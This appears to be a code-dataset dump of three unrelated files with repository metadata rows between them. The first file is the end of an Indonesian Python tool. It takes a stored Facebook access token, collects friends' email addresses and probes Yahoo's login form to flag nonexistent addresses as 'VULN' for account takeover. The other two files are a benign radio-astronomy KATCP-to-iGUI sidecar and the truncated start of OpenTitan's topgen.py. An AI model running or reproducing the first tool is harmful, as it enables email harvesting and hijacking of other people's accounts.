id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write("Nama: "+ nama +"ID :" + id +"Email: "+ mail + '\n')
print("\033[1;96m[\033[1;97mVULNโ\033[1;96m] \033[1;92m" +mail+" \033[1;96m=>\x1b[1;97m"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_file():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
mpsh = []
jml = 0
jalan('\033[1;96m[โบ] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;96m="
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;96m[\033[1;92mVULNโ\033[1;96m] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"[email protected]"
] | |
eb0b852d2a658bb922774b066101a08867293196 | 48098932f49ae05c4528f5d79385e2d8bb1731ec | /mpikat/sidecars/igui_sidecar.py | e7f0d7b57e1a5119625f95baf849a63eb3f1c8c4 | [
"MIT"
] | permissive | ewanbarr/mpikat | 80fcb29dcc4d00b52a5c49609d9ca35cf0964da5 | 1c9a7376f9e79dfeec5a151d8f483d6fdf3e7cc9 | refs/heads/master | 2022-09-25T14:51:30.885196 | 2020-10-20T14:05:50 | 2020-10-20T14:05:50 | 237,917,037 | 0 | 0 | MIT | 2020-03-13T14:35:50 | 2020-02-03T08:22:04 | null | UTF-8 | Python | false | false | 30,256 | py | import signal
import logging
import tornado
import requests
import types
import pprint
import json
from abc import ABCMeta, abstractmethod
from optparse import OptionParser
from katcp import KATCPClientResource
log = logging.getLogger("mpikat.katcp_to_igui_sidecar")
class IGUILoginException(Exception):
pass
class IGUIMappingException(Exception):
pass
class IGUIObject(object):
__metaclass__ = ABCMeta
def __init__(self, id_, name, detail, parent, child_map):
"""
@brief Abstract base class for IGUI objects
@param id_ The iGUI ID for the object
@param name The iGUI name for the object
@param detail A dictionary containing the iGUI description for the object
@param parent The parent object for this object
@param child_map An IGUIMap subclass instance containing a mapping to any child objects
"""
self.id = id_
self.name = name
self.detail = detail
self.parent = parent
self.children = child_map
def __repr__(self):
return "<class {}: {}>".format(self.__class__.__name__, self.name)
class IGUIRx(IGUIObject):
def __init__(self, detail):
"""
@brief Class for igui receivers.
@param detail A dictionary containing the iGUI description for the object
@note The 'detail' dictionary must contain at minimum 'rx_id' and 'rx_name' keys
"""
super(IGUIRx, self).__init__(detail["rx_id"], detail["rx_name"],
detail, None, IGUIDeviceMap(self))
self.devices = self.children
class IGUIDevice(IGUIObject):
def __init__(self, detail, parent):
"""
@brief Class for igui devices.
@param detail A dictionary containing the iGUI description for the object
@param parent The parent object for this object
@note The 'detail' dictionary must contain at minimum 'device_id' and 'name' keys
"""
super(IGUIDevice, self).__init__(detail["device_id"], detail["name"],
detail, parent, IGUITaskMap(self))
self.tasks = self.children
class IGUITask(IGUIObject):
def __init__(self, detail, parent):
"""
@brief Class for igui tasks.
@param detail A dictionary containing the iGUI description for the object
@param parent The parent object for this object
@note The 'detail' dictionary must contain at minimum 'task_id' and 'task_name' keys
"""
super(IGUITask, self).__init__(detail["task_id"], detail["task_name"],
detail, parent, None)
class IGUIMap(object):
__metaclass__ = ABCMeta
def __init__(self):
"""
@brief Abstract base class for maps of iGUI objects.
"""
self._id_to_name = {}
self._name_to_id = {}
self._by_id = {}
def by_name(self, name):
"""
@brief Look up an iGUI object by name
@param name The name of the object
@return An iGUI object
"""
return self._by_id[self._name_to_id[name]]
def by_id(self, id_):
"""
@brief Look up an iGUI object by id
@param self The object
@param id_ The ID of the iGUI object
@return An iGUI object
"""
return self._by_id[id_]
@abstractmethod
def add(self, id_, name, child):
"""
@brief Add an iGUI object to this map
@param id_ The ID of the object
@param name The name of the object
@param child The child iGUI object
"""
self._id_to_name[id_] = name
self._name_to_id[name] = id_
self._by_id[id_] = child
def __iter__(self):
return self._by_id.values().__iter__()
def _custom_repr(self):
out = {}
for id_, child in self._by_id.items():
if child.children:
out[repr(child)] = child.children._custom_repr()
else:
out[repr(child)] = ''
return out
def __repr__(self):
return pprint.pformat(self._custom_repr(), indent=2)
class IGUIRxMap(IGUIMap):
def __init__(self):
"""
@brief Class for igui receiver map.
"""
super(IGUIRxMap, self).__init__()
def add(self, rx):
"""
@brief Add and iGUI receiver to the map
@param task A iGUI receiver dictionary
"""
super(IGUIRxMap, self).add(rx["rx_id"], rx["rx_name"], IGUIRx(rx))
class IGUIDeviceMap(IGUIMap):
def __init__(self, parent_rx):
"""
@brief Class for igui device map.
@param parent_rx The IGUIRx instance that is this device's parent
"""
super(IGUIDeviceMap, self).__init__()
self._parent_rx = parent_rx
def add(self, device):
"""
@brief Add and iGUI device to the map
@param device A iGUI device dictionary
"""
super(IGUIDeviceMap, self).add(device["device_id"], device["name"],
IGUIDevice(device, self._parent_rx))
class IGUITaskMap(IGUIMap):
def __init__(self, parent_device):
"""
@brief Class for igui task map.
@param parent_device The IGUIDevice instance that is this task's parent
"""
super(IGUITaskMap, self).__init__()
self._parent_device = parent_device
def add(self, task):
"""
@brief Add and iGUI task to the map
@param task A iGUI task dictionary
"""
super(IGUITaskMap, self).add(task["task_id"], task["task_name"],
IGUITask(task, self._parent_device))
def _custom_repr(self):
return [repr(task) for task in self._by_id.values()]
class IGUIConnection(object):
def __init__(self, host, user, password):
"""
@brief Class for igui connection.
@detail This class wraps a connection to an iGUI instance, providing methods
to query the server and update task values. Some functions require a
valid login. To use these functions the 'login' method of the class
must be called with valid credentials
@param host The hostname or IP address for the iGUI server (can include a port number)
"""
self._session = requests.Session()
self._logged_in = False
self._rx_by_name = {}
self._rx_by_id = {}
self._devices = {}
self._tasks = {}
self.igui_group_id = None
self._host = host
self._user = user
self._password = password
self._url = "http://{}/getData.php".format(self._host)
self._headers = {
'Host': '{}'.format(self._host),
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'DNT': '1',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'http://{}/icom/home'.format(self._host),
'Connection': 'keep-alive'}
def login(self):
"""
@brief Login to the iGUI server
@detail If the login is unsuccessful and IGUILoginException will be raised
@param user The username
@param password The password
"""
response = self._session.post(self._url, headers=self._headers,
data=self._make_data("checkUser", [self._user, self._password]))
if response.text != "true":
log.debug(response.text)
raise IGUILoginException(
"Could not log into iGUI host {}".format(self._host))
userdata = json.loads(self._session.post(self._url, headers=self._headers,
data=self._make_data("loadUsers")).text)
fedata = json.loads(self._session.post(self._url, headers=self._headers,
data=self._make_data("loadFEData")).text)
for i in range(len(fedata)):
for j in range(len(userdata)):
if (fedata[i]['guid'] == userdata[j]['guid']) & (fedata[i]['username'] == self._user):
if userdata[j]['group_id'] == '95b109308df411e58cde0800277d0263':
log.info('User is an engineer')
self.igui_group_id = userdata[j]['group_id']
else:
raise IGUILoginException(
"You are not an engineer, you can't use the sidecar.")
self._logged_in = True
def build_igui_representation(self):
"""
@brief Builds a representation of the igui data model.
@detail The return map is only valid at the moment it is returned. Methods in
act directly on the map to register new receivers, devices and tasks
but remote changes to iGUI will not be reflected and the representation
must be rebuild to synchronize with any server-side changes.
@return An IGUIRxMap object
"""
log.debug("building IGUI rep")
rx_map = IGUIRxMap()
for rx in self.load_all_rx_data():
# for rx in self.load_all_rx():
log.debug(rx)
rx_map.add(rx)
for device in self.load_all_devices():
try:
# log.debug(rx_map.by_id(device["rx_id"]).devices.add(device))
rx_map.by_id(device["rx_id"]).devices.add(device)
except TypeError:
pass
for task in self.load_all_tasks():
try:
# log.debug(rx_map.by_id(task["rx_id"]).devices.by_id(task["device_id"]).tasks.add(task))
rx_map.by_id(task["rx_id"]).devices.by_id(
task["device_id"]).tasks.add(task)
except TypeError:
pass
return rx_map
def _safe_post(self, *args, **kwargs):
FAIL_RESPONSE = u'"Not a valid session!"'
# log.debug("POST request: {}, {}".format(args, kwargs))
response = self._session.post(*args, **kwargs)
# log.debug("POST response: {}".format(response.text))
if response.text == FAIL_RESPONSE:
self.login()
response = self._session.post(*args, **kwargs)
if response.text == FAIL_RESPONSE:
raise IGUILoginException("Unable to login to IGUI")
return response
def _update_task(self, task, value):
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("updateTask", task.id, value))
return response.text
def set_rx_status(self, reciever, values):
"""
@brief Set the status of a reciever
@param reciever An IGUIRx object to be updated
@param values A list of the new values for the reciever status
@param active (Y/N), test_mode (Y/N), port and username
@return true or false
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("setRxStatus", reciever.id, values))
return response.text
def set_device_status(self, device, value):
"""
@brief Set the status of a device
@param reciever An IGUIDevice object to be updated
@param values A value for the reciever status (Y/N)
@return true or false
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("setDeviceStatus", device.id, value))
return response.text
def update_group_rx_privileges(self, group_id, value):
"""
@brief Set the flag for "show_rx" of a task in the IGUI DB
@param task Updated the show_rx flag for the newly created RX
@param values Group ID and rx_id in fn_in, Y/N for the value field
@note This returns the text response from the server
@note update_group_rx_privileges([group_id,rx_id],"Y")
@note update_group_rx_privileges([group_id,rx_id,"update"],"Y")
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("updGrpRXPrivileges", group_id, value))
return response.text
def update_group_task_privileges(self, group_id, value):
"""
@brief Set the flag for "update task" of a task
@param task An IGUITask object to be updated
@param value The new value for the task
@note This returns the text response from the server
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("updGrpTasksPrivileges", group_id, value))
return response.text
def set_task_value(self, task, value):
"""
@brief Set the value of a task
@param task An IGUITask object to be updated
@param value The new value for the task
@note Currently this returns the text response from the server
but as the server-side method is not currently setup exactly
as is required this is not meaningful. When the server-side
implementation is updated, this will be replaced with a success
or fail check.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("setTaskValue", task.id, value))
return response.text
def set_task_blob(self, task, value):
"""
@brief Update the blob in a task
@param task An IGUITask object to be updated
@param value The new value for the task
@note Currently this returns the text response from the server
but as the server-side method is not currently setup exactly
as is required this is not meaningful. When the server-side
implementation is updated, this will be replaced with a success
or fail check.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("setTaskBlob", task.id, value))
return response.text
def update_task(self, task, value):
"""
@brief Update the value of a task
@param task An IGUITask object to be updated
@param value The new value for the task
@note Currently this returns the text response from the server
but as the server-side method is not currently setup exactly
as is required this is not meaningful. When the server-side
implementation is updated, this will be replaced with a success
or fail check.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("updateTask", task.id, value))
return response.text
def load_all_devices(self):
"""
@brief Gets all iGUI devices.
@return An IGUIDeviceMap object.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("loadAllDevices"))
devices = response.json()
if devices == "N":
log.warning("No devices returned")
devices = []
return devices
def load_all_rx(self):
"""
@brief Gets all iGUI recievers.
@return An IGUIRxMap object.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("loadRx"))
rx = response.json()
if rx == "N":
log.warning("No receivers returned")
rx = []
return rx
def load_all_rx_data(self):
"""
@brief Gets all iGUI recievers data.
@return An IGUIRxMap object.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("loadRXData"))
rx = response.json()
if rx == "N":
log.warning("No receiver data returned (does the user have engineer priveledges?)")
rx = []
return rx
def load_all_tasks(self):
"""
@brief Gets all iGUI tasks.
@return An IGUITaskMap object.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("loadAllTasks"))
tasks = response.json()
return tasks
def create_rx(self, icom_id, params):
"""
@brief Create a receiver
@param task Create an IGUIRecever object
@param value icom_id and the parameters for the new receiver
@return return a string of a JSON object of the newly created receiver
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("createRx", icom_id, params))
return response.text
def delete_rx(self, rx_id):
"""
@brief Delete a receiver
@param value rx_id of that receiver that you want to delete
@return return a true/false value
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("deleteRx", rx_id))
return response.text
def create_device(self, reciever, params):
"""
@brief Create a device
@param task An IGUIRecever object where a device is added as a child
@param value Name of the new device, version number, active status
@return return a string of a JSON object of the newly created device
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("createDevice", reciever.id, params))
return response.text
def create_task(self, device, params):
"""
@brief Create a task
@param task An IGUIDevice object where a task is added as a child
@param value List of parameters of the new task (task_name, task_type(fe_task_type),
task_unit, mysql_task_type,option_available, current_value, current_value_blob,init_val, lower_limit, upper_limit, update_interval)
@return IGUItask object
@note params example :["TEMP","NONE","C","GETSET","0", "12","blob","0","0","1000","300"]
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("createTask", device.id, params))
return response.text
def _make_data(self, fn, fn_in='0', fn_in_param='0'):
data = []
def _helper(name, param):
if hasattr(param, "__iter__") and not isinstance(param, types.StringTypes):
for subparam in param:
data.append(("{}[]".format(name), subparam))
else:
data.append((name, param))
_helper("data[fn]", fn)
_helper("data[fn_in]", fn_in)
_helper("data[fn_in_param]", fn_in_param)
return data
class KATCPToIGUIConverter(object):
def __init__(self, host, port, igui_host, igui_user, igui_pass, igui_device_id):
"""
@brief Class for katcp to igui converter.
@param host KATCP host address
@param port KATCP port number
@param igui_host iGUI server hostname
@param igui_user iGUI username
@param igui_pass iGUI password
@param igui_device_id iGUI device ID
"""
self.rc = KATCPClientResource(dict(
name="test-client",
address=(host, port),
controlled=True))
self.host = host
self.port = port
self.igui_host = igui_host
self.igui_user = igui_user
self.igui_pass = igui_pass
self.igui_group_id = None
self.igui_device_id = igui_device_id
self.igui_connection = IGUIConnection(
self.igui_host, self.igui_user, self.igui_pass)
self.igui_task_id = None
self.igui_rxmap = None
self.ioloop = None
self.ic = None
self.api_version = None
self.implementation_version = None
self.previous_sensors = set()
def start(self):
"""
@brief Start the instance running
@detail This call will trigger connection of the KATCPResource client and
will login to the iGUI server. Once both connections are established
the instance will retrieve a mapping of the iGUI receivers, devices
and tasks and will try to identify the parent of the device_id
provided in the constructor.
@param self The object
@return { description_of_the_return_value }
"""
@tornado.gen.coroutine
def _start():
log.debug("Waiting on synchronisation with server")
yield self.rc.until_synced()
log.debug("Client synced")
log.debug("Requesting version info")
# This information can be used to get an iGUI device ID
response = yield self.rc.req.version_list()
log.info("response {}".format(response))
# for internal device KATCP server, response.informs[2].arguments return index out of range
#_, api, implementation = response.informs[2].arguments
#self.api_version = api
#self.implementation_version = implementation
#log.info("katcp-device API: {}".format(self.api_version))
#log.info("katcp-device implementation: {}".format(self.implementation_version))
self.ioloop.add_callback(self.update)
log.debug("Starting {} instance".format(self.__class__.__name__))
# self.igui_connection.login()
#self.igui_connection.login(self.igui_user, self.igui_pass)
self.igui_rxmap = self.igui_connection.build_igui_representation()
#log.debug(self.igui_rxmap)
# Here we do a look up to find the parent of this device
for rx in self.igui_rxmap:
log.debug(rx.id)
if self.igui_device_id in rx.devices._by_id.keys():
log.debug(self.igui_device_id)
log.debug(rx.id)
self.igui_rx_id = rx.id
log.debug("Found Rx parent: {}".format(self.igui_rx_id))
break
else:
log.debug("Device '{}' is not a child of any receiver".format(
self.igui_device_id))
raise IGUIMappingException(
"Device '{}' is not a child of any receiver".format(self.igui_device_id))
#log.debug("iGUI representation:\n{}".format(self.igui_rxmap))
self.rc.start()
self.ic = self.rc._inspecting_client
self.ioloop = self.rc.ioloop
self.ic.katcp_client.hook_inform("interface-changed",
lambda message: self.ioloop.add_callback(self.update))
self.ioloop.add_callback(_start)
@tornado.gen.coroutine
def update(self):
"""
@brief Synchronise with the KATCP servers sensors and register new listners
"""
log.debug("Waiting on synchronisation with server")
yield self.rc.until_synced()
log.debug("Client synced")
current_sensors = set(self.rc.sensor.keys())
log.debug("Current sensor set: {}".format(current_sensors))
removed = self.previous_sensors.difference(current_sensors)
log.debug("Sensors removed since last update: {}".format(removed))
added = current_sensors.difference(self.previous_sensors)
log.debug("Sensors added since last update: {}".format(added))
for name in list(added):
log.debug(
"Setting sampling strategy and callbacks on sensor '{}'".format(name))
# strat3 = ('event-rate', 2.0, 3.0) #event-rate doesn't work
# self.rc.set_sampling_strategy(name, strat3) #KATCPSensorError:
# Error setting strategy
# not sure that auto means here
self.rc.set_sampling_strategy(name, "auto")
#self.rc.set_sampling_strategy(name, ["period", (10)])
#self.rc.set_sampling_strategy(name, "event")
self.rc.set_sensor_listener(name, self._sensor_updated)
self.previous_sensors = current_sensors
def _sensor_updated(self, sensor, reading):
"""
@brief Callback to be executed on a sensor being updated
@param sensor The sensor
@param reading The sensor reading
"""
log.debug("Recieved sensor update for sensor '{}': {}".format(
sensor.name, repr(reading)))
try:
rx = self.igui_rxmap.by_id(self.igui_rx_id)
except KeyError:
raise Exception(
"No iGUI receiver with ID {}".format(self.igui_rx_id))
try:
device = rx.devices.by_id(self.igui_device_id)
except KeyError:
raise Exception(
"No iGUI device with ID {}".format(self.igui_device_id))
try:
#self.igui_rxmap = self.igui_connection.build_igui_representation()
#device = self.igui_rxmap.by_id(self.igui_rx_id).devices.by_id(self.igui_device_id)
task = device.tasks.by_name(sensor.name)
except KeyError:
if (sensor.name[-3:] == 'PNG'):
task = json.loads(self.igui_connection.create_task(
device, (sensor.name, "NONE", "", "IMAGE", "GET_SET", "0", "0", "0", "-10000000000000000", "10000000000000000", "300")))
else:
task = json.loads(self.igui_connection.create_task(
device, (sensor.name, "NONE", "", "GETSET", "GET", "0", "0", "0", "-10000000000000000", "10000000000000000", "300")))
self.igui_task_id = str(task[0]['rx_task_id'])
self.igui_connection.update_group_task_privileges(
[self.igui_connection.igui_group_id, self.igui_task_id], "Y")
self.igui_connection.update_group_task_privileges(
[self.igui_connection.igui_group_id, self.igui_task_id, "update"], "Y")
self.igui_rxmap = self.igui_connection.build_igui_representation()
device = self.igui_rxmap.by_id(
self.igui_rx_id).devices.by_id(self.igui_device_id)
task = device.tasks.by_id(self.igui_task_id)
if (sensor.name[-3:] == 'PNG'): # or some image type that we finally agreed on
log.debug(sensor.name)
log.debug(sensor.value)
log.debug(len(sensor.value))
self.igui_connection.set_task_blob(task, reading.value)
else:
self.igui_connection.set_task_value(task, sensor.value)
def stop(self):
"""
@brief Stop the client
"""
self.rc.stop()
@tornado.gen.coroutine
def on_shutdown(ioloop, client):
log.info("Shutting down client")
yield client.stop()
ioloop.stop()
def main():
usage = "usage: %prog [options]"
parser = OptionParser(usage=usage)
parser.add_option('-H', '--host', dest='host', type=str,
help='The hostname for the KATCP server to connect to')
parser.add_option('-p', '--port', dest='port', type=int,
help='The port number for the KATCP server to connect to')
parser.add_option('', '--igui_host', dest='igui_host', type=str,
help='The hostname of the iGUI interface', default="127.0.0.1")
parser.add_option('', '--igui_user', dest='igui_user', type=str,
help='The username for the iGUI connection')
parser.add_option('', '--igui_pass', dest='igui_pass', type=str,
help='The password for the IGUI connection')
parser.add_option('', '--igui_device_id', dest='igui_device_id', type=str,
help='The iGUI device ID for the managed device')
parser.add_option('', '--log_level', dest='log_level', type=str,
help='Logging level', default="INFO")
(opts, args) = parser.parse_args()
FORMAT = "[ %(levelname)s - %(asctime)s - %(filename)s:%(lineno)s] %(message)s"
logger = logging.getLogger('mpikat')
logging.basicConfig(format=FORMAT)
logger.setLevel(opts.log_level.upper())
logging.getLogger('katcp').setLevel('INFO')
ioloop = tornado.ioloop.IOLoop.current()
log.info("Starting KATCPToIGUIConverter instance")
client = KATCPToIGUIConverter(opts.host, opts.port,
opts.igui_host, opts.igui_user,
opts.igui_pass, opts.igui_device_id)
signal.signal(
signal.SIGINT,
lambda sig, frame: ioloop.add_callback_from_signal(
on_shutdown, ioloop, client))
def start_and_display():
client.start()
log.info("Ctrl-C to terminate client")
ioloop.add_callback(start_and_display)
ioloop.start()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
e1051bcce1faa00602bf7d2638fa6b85801899e9 | fc08261383797c4581cc6df05bfcfa0b57e52701 | /util/opentitan/topgen.py | 6870c743e59719fca3d377582ae1609ad370ddb0 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | waleeds1/azadi-new | a4c68508206003215f860c0dbc9f4c7b0ef5cac0 | c2e42438bf3ebe9cf747e3b1902eb555afcade3a | refs/heads/main | 2023-08-15T21:21:50.756003 | 2021-10-14T07:03:08 | 2021-10-14T07:03:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46,449 | py | #!/usr/bin/env python3
# Copyright lowRISC contributors.
# Licensed under the Apache License, Version 2.0, see LICENSE for details.
# SPDX-License-Identifier: Apache-2.0
r"""Top Module Generator
"""
import argparse
import logging as log
import random
import subprocess
import sys
from collections import OrderedDict
from copy import deepcopy
from io import StringIO
from pathlib import Path
from typing import Dict, Optional, Tuple
import hjson
from mako import exceptions
from mako.template import Template
import tlgen
from reggen import access, gen_rtl, window
from reggen.inter_signal import InterSignal
from reggen.ip_block import IpBlock
from reggen.lib import check_list
from topgen import amend_clocks, get_hjsonobj_xbars
from topgen import intermodule as im
from topgen import lib as lib
from topgen import merge_top, search_ips, validate_top
from topgen.c import TopGenC
from topgen.gen_dv import gen_dv
from topgen.top import Top
# Common header for generated files
warnhdr = '''//
// ------------------- W A R N I N G: A U T O - G E N E R A T E D C O D E !! -------------------//
// PLEASE DO NOT HAND-EDIT THIS FILE. IT HAS BEEN AUTO-GENERATED WITH THE FOLLOWING COMMAND:
'''
genhdr = '''// Copyright lowRISC contributors.
// Licensed under the Apache License, Version 2.0, see LICENSE for details.
// SPDX-License-Identifier: Apache-2.0
''' + warnhdr
SRCTREE_TOP = Path(__file__).parent.parent.resolve()
TOPGEN_TEMPLATE_PATH = Path(__file__).parent / 'topgen/templates'
def generate_top(top, name_to_block, tpl_filename, **kwargs):
top_tpl = Template(filename=tpl_filename)
try:
return top_tpl.render(top=top, name_to_block=name_to_block, **kwargs)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
return ""
def generate_xbars(top, out_path):
topname = top["name"]
gencmd = ("// util/topgen.py -t hw/top_{topname}/data/top_{topname}.hjson "
"-o hw/top_{topname}/\n\n".format(topname=topname))
for obj in top["xbar"]:
xbar_path = out_path / 'ip/xbar_{}/data/autogen'.format(obj["name"])
xbar_path.mkdir(parents=True, exist_ok=True)
xbar = tlgen.validate(obj)
xbar.ip_path = 'hw/top_' + top["name"] + '/ip/{dut}'
# Generate output of crossbar with complete fields
xbar_hjson_path = xbar_path / "xbar_{}.gen.hjson".format(xbar.name)
xbar_hjson_path.write_text(genhdr + gencmd +
hjson.dumps(obj, for_json=True))
if not tlgen.elaborate(xbar):
log.error("Elaboration failed." + repr(xbar))
try:
results = tlgen.generate(xbar, "top_" + top["name"])
except: # noqa: E722
log.error(exceptions.text_error_template().render())
ip_path = out_path / 'ip/xbar_{}'.format(obj["name"])
for filename, filecontent in results:
filepath = ip_path / filename
filepath.parent.mkdir(parents=True, exist_ok=True)
with filepath.open(mode='w', encoding='UTF-8') as fout:
fout.write(filecontent)
dv_path = out_path / 'ip/xbar_{}/dv/autogen'.format(obj["name"])
dv_path.mkdir(parents=True, exist_ok=True)
# generate testbench for xbar
tlgen.generate_tb(xbar, dv_path, "top_" + top["name"])
# Read back the comportable IP and amend to Xbar
xbar_ipfile = ip_path / ("data/autogen/xbar_%s.hjson" % obj["name"])
with xbar_ipfile.open() as fxbar:
xbar_ipobj = hjson.load(fxbar,
use_decimal=True,
object_pairs_hook=OrderedDict)
r_inter_signal_list = check_list(xbar_ipobj.get('inter_signal_list', []),
'inter_signal_list field')
obj['inter_signal_list'] = [
InterSignal.from_raw('entry {} of the inter_signal_list field'
.format(idx + 1),
entry)
for idx, entry in enumerate(r_inter_signal_list)
]
def generate_alert_handler(top, out_path):
# default values
esc_cnt_dw = 32
accu_cnt_dw = 16
async_on = "'0"
# leave this constant
n_classes = 4
topname = top["name"]
# check if there are any params to be passed through reggen and placed into
# the generated package
ip_list_in_top = [x["name"].lower() for x in top["module"]]
ah_idx = ip_list_in_top.index("alert_handler")
if 'localparam' in top['module'][ah_idx]:
if 'EscCntDw' in top['module'][ah_idx]['localparam']:
esc_cnt_dw = int(top['module'][ah_idx]['localparam']['EscCntDw'])
if 'AccuCntDw' in top['module'][ah_idx]['localparam']:
accu_cnt_dw = int(top['module'][ah_idx]['localparam']['AccuCntDw'])
if esc_cnt_dw < 1:
log.error("EscCntDw must be larger than 0")
if accu_cnt_dw < 1:
log.error("AccuCntDw must be larger than 0")
# Count number of alerts
n_alerts = sum([x["width"] if "width" in x else 1 for x in top["alert"]])
if n_alerts < 1:
# set number of alerts to 1 such that the config is still valid
# that input will be tied off
n_alerts = 1
log.warning("no alerts are defined in the system")
else:
async_on = ""
for alert in top['alert']:
for k in range(alert['width']):
async_on = str(alert['async']) + async_on
async_on = ("%d'b" % n_alerts) + async_on
log.info("alert handler parameterization:")
log.info("NAlerts = %d" % n_alerts)
log.info("EscCntDw = %d" % esc_cnt_dw)
log.info("AccuCntDw = %d" % accu_cnt_dw)
log.info("AsyncOn = %s" % async_on)
# Define target path
rtl_path = out_path / 'ip/alert_handler/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
doc_path = out_path / 'ip/alert_handler/data/autogen'
doc_path.mkdir(parents=True, exist_ok=True)
# Generating IP top module script is not generalized yet.
# So, topgen reads template files from alert_handler directory directly.
tpl_path = Path(__file__).resolve().parent / '../hw/ip/alert_handler/data'
hjson_tpl_path = tpl_path / 'alert_handler.hjson.tpl'
# Generate Register Package and RTLs
out = StringIO()
with hjson_tpl_path.open(mode='r', encoding='UTF-8') as fin:
hjson_tpl = Template(fin.read())
try:
out = hjson_tpl.render(n_alerts=n_alerts,
esc_cnt_dw=esc_cnt_dw,
accu_cnt_dw=accu_cnt_dw,
async_on=async_on,
n_classes=n_classes)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
log.info("alert_handler hjson: %s" % out)
if out == "":
log.error("Cannot generate alert_handler config file")
return
hjson_gen_path = doc_path / "alert_handler.hjson"
gencmd = (
"// util/topgen.py -t hw/top_{topname}/data/top_{topname}.hjson --alert-handler-only "
"-o hw/top_{topname}/\n\n".format(topname=topname))
with hjson_gen_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + gencmd + out)
# Generate register RTLs (currently using shell execute)
# TODO: More secure way to gneerate RTL
gen_rtl.gen_rtl(IpBlock.from_text(out, [], str(hjson_gen_path)),
str(rtl_path))
def generate_plic(top, out_path):
topname = top["name"]
# Count number of interrupts
# Interrupt source 0 is tied to 0 to conform RISC-V PLIC spec.
# So, total number of interrupts are the number of entries in the list + 1
src = sum([x["width"] if "width" in x else 1
for x in top["interrupt"]]) + 1
# Target and priority: Currently fixed
target = int(top["num_cores"], 0) if "num_cores" in top else 1
prio = 3
# Define target path
# rtl: rv_plic.sv & rv_plic_reg_pkg.sv & rv_plic_reg_top.sv
# data: rv_plic.hjson
rtl_path = out_path / 'ip/rv_plic/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
doc_path = out_path / 'ip/rv_plic/data/autogen'
doc_path.mkdir(parents=True, exist_ok=True)
hjson_path = out_path / 'ip/rv_plic/data/autogen'
